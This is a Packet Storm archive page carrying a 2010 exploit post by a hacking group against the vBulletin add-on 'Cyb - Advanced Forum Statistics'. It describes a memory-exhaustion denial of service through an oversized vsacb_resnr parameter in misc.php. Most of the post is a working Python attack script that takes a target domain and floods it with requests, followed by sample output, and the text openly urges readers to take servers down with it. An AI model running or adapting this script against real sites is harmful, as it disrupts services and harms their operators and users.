what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

vBulletin Cyb - Advanced Forum Statistics Denial Of Service

vBulletin Cyb - Advanced Forum Statistics Denial Of Service
Posted Apr 12, 2010
Authored by Andhra Hackers

vBulletin Cyb - Advanced Forum Statistics suffers from a denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | ec3d30e76b68c4548dca6b82771796442ce22bc81e811bb14d8b7bfa28075652

vBulletin Cyb - Advanced Forum Statistics Denial Of Service

Change Mirror Download


# Exploit Title: vBulletin "Cyb - Advanced Forum Statistics" DOS
# Date: 10-4-2010
# Author: Andhra Hackers
# Software Link:
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Code :


PHP crashes existed from a long time back and there were several issues which were a reason for that.
1)PHP pack() function bug has been there for about a long time, were if PHP try to allocate more memory more than generally allocated to PHP function then the the request is terminated and PHP exits/Crashes, this might even send a huge load to the server.

2)PHP memory allocation is done via the php.ini file of PHP installation, So if we could make PHP try to load with more memmory than it could handle then we cold possibly crash php or even the server causing a huge CPU usage.

3)A vulnerability exist in vBulletin add-on "Cyb - Advanced Forum Statistics" in the misc.php file show=latestposts&vsacb_resnr=, were application loads all latest 'n' no of post
depending on (vsacb_resnr= n) value. As no of post "vsacb_resnr" is user specific,that means we could make vBulletin to load huge no of datas from DB causing it to run out of memory and crash PHP and huge load may crash hosted apache also and won't be able to recover easily.

Attached is exploit code which could easily crash a vBulletin which has got "Cyb - Advanced Forum Statistics" add-on installed.
Either You could Use the attached exploit code to DOS the server or you could Simply move to the vulnerable page and
sent simultaneous request by refreshing the page.


An attacker could exploit this issue to crash the php installed and the crash might DOS the entire server for hours or attacker will be able to
download php files from the server.

A quick fix for this is to modify php.ini config file and increase the Php allocated memory to a higher value.


Exploit:
import urllib,urllib2,re
print "####################################"
print "#[+]ICW 0-day Domain Crasher #"
print "#[+] Exploit found by Yash [ICW] #"
print "#[+] Exploit Coded by FB1H2S [ICW] #"
print "#[+] Care-Taker d4rk-blu [ICW] #"
print "#[+] Indian Cyber Warriors #"
print "####################################\n"
print "Enter Domain Adress:"
domain=raw_input("[+]Ex: www.site.com<http://www.site.com>:")
url ='http://'+domain+'/misc.php?show=latestposts&vsacb_resnr=10000000'
res = urllib.urlopen(url).read(200)
phpmem= re.findall('of (.*?)bytes.*?',res)
bytes=int(phpmem[0])
mb=bytes/1048576
print '[+]Server php memmory is:'+str(mb)+' MB'
print "[+]Enter the No of request you wann send:"
kill=raw_input("Some 20-30 will be enough:")
try:
for i in range(1,int(kill)):
print i
res1 = urllib.urlopen(url).read(200)
print res1
except(IOError),msg: print "Server will be FCUK'ed by now"


################################################################
C:\Python25>python vbexploit.py
####################################
#[+]ICW 0-day Domain Crasher #
#[+] Bug found by Yash [ICW] #
#[+] Exploit Coded by FB1H2S [ICW] #
#[+] Care-Taker d4rk-blu [ICW] #
#[+] Indian Cyber Warriors #
####################################

Enter Domain Adress:
[+]Ex: www.site.com<http://www.site.com>: sitehere

[+]Server php memmory is:32 MB
[+]Enter the No of request you wann send:20
1
2
3
Server will be FCUK'ed by now


#Yash (yash@andhrahackers.com<mailto:yash@andhrahackers.com>)

#################################################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
#Thanks: SaiSatish,FB1H2S,d4rk-blu™,Mannu,Harin,Jappy,Dj Hoodlum Don,Sam,Circuit,cph4cker
#Shoutz: hg_H@x0r,r45c4l,41w@r10r,Hackuin
#Catch us at www.andhrahackers.com<http://www.andhrahackers.com> or www.teamicw.in<http://www.teamicw.in>
# Thnx to FB1H2S for Python Code :-)



Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close